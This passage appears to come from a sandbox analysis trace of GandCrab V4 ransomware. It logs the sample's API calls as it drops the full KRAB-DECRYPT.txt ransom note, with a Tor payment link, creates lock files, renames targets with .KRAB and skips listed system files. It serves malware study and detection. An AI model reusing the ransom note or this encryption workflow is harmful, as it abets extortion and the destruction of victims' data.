returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0060.158] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.158] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.159] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.159] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\KRAB-DECRYPT.txt") returned 92 [0060.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0060.175] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.175] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.175] CloseHandle (hObject=0x440) returned 1 [0060.176] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.176] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.176] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x170)) [0060.176] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.176] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.177] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.177] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock") returned 98 [0060.177] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0060.178] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.178] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned 75 [0060.178] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0060.178] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd1e0 [0060.178] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.178] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.178] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.178] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.178] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.178] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.178] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.178] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock" [0060.178] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.179] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 103 [0060.179] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\d2ca4a08d2ca4dee3d.lock") returned 98 [0060.179] lstrlenW (lpString=".lock") returned 5 [0060.179] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.179] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.179] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.179] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.179] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.179] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.179] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.180] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt" [0060.180] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.180] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt.KRAB") returned 96 [0060.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt") returned 91 [0060.180] lstrlenW (lpString=".txt") returned 4 [0060.180] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.180] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.180] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt") returned 91 [0060.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\KRAB-DECRYPT.txt") returned 91 [0060.180] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.180] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.180] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.180] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.181] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.181] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.181] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.181] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0060.181] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0060.181] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0060.181] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0060.181] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.181] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.181] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.181] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.181] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.181] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.182] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.182] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\KRAB-DECRYPT.txt") returned 96 [0060.182] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0060.197] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.197] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.198] CloseHandle (hObject=0x448) returned 1 [0060.198] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.198] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.198] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x18f)) [0060.198] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.199] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.199] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.199] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock") returned 102 [0060.199] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0060.204] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.204] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.204] lstrlenW 